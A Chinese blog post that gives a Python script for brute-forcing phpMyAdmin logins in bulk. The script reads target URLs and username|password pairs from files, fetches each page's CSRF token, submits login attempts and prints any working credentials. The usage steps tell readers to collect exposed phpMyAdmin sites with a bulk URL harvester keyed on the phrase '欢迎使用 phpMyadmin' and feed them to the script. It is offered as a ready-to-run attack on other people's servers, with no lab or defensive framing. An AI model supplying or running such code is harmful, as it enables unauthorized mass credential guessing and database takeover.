python批量爆破phpMyadmin

使用python实现phpMyadmin的批量爆破

0x01 脚本实现

import requests
from bs4 import BeautifulSoup as bp
def attack(url,username,password):
    headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36"}
    session=requests.session()
    try:
        response=session.get(url,headers=headers)
        soup=bp(response.text,"lxml")
        my_Dict={"type":"hidden","name":"token"}
        tiqu=soup.find(attrs=my_Dict)
        data={}
        data["token"]=tiqu.get("value",0)
        if data==0:
            return "no token"
        data['pma_username']=username
        data['pma_password']=password
        index_url=url+"index.php"
        response1=session.post(url=index_url,data=data)
        htmls=response1.text
        if "phpMyAdmin is more friendly with a " in htmls:
            print("[+] username:{0}, password:{1}".format(username,password))
        else:
            pass
    except Exception as e:
        pass


if __name__=='__main__':
    with open('./Good.txt','r') as urls:
        host_t=urls.readlines()
        for url in host_t:
            if url[-1]=='\n':
                url=url[:-1]
            with open("mima.txt","r") as mima:
                my_mima=mima.readlines()
                for mima in my_mima:
                    username,password=mima.split("|")
                    print("attack {0} use username:{1}|password:{2}".format(url,username,password))
                    attack(url,username,password)

0x02 脚本的使用

  • 先用批量采集工具采集url(关键词:“欢迎使用 phpMyadmin”)
  • 将采集的url导出为Good.txt路径
  • 然后密码的格式为: root|toor ,|左边为root,右边为toor

  转载请注明: 星晴 python批量爆破phpMyadmin

 上一篇
机器学习之线性回归方法 机器学习之线性回归方法
1. 多元线性回归以预测房子价格为例,房子的属性除了其面积大小外,这里还有房子楼层数、房子年龄、厅室数等。也就是说一个房子的特征将不只一个,而是多个。这里用n表示特征数目,x(i)表示的是训练集中第i个样本的特征向量,x(i)j表示的第i个
2019-04-12 starjian
下一篇 
安全行业小工具以及学习资源收集 安全行业小工具以及学习资源收集
简介安全行业小工具以及学习资源收集项目,此项目部分内容来自:https://www.t00ls.net/thread-38964-1-1.html感谢其分享,这里只是作为个人备份,如有问题可邮件通知。 安全资源安全资源包括安全书籍,资料,安
2019-04-12 starjian
  目录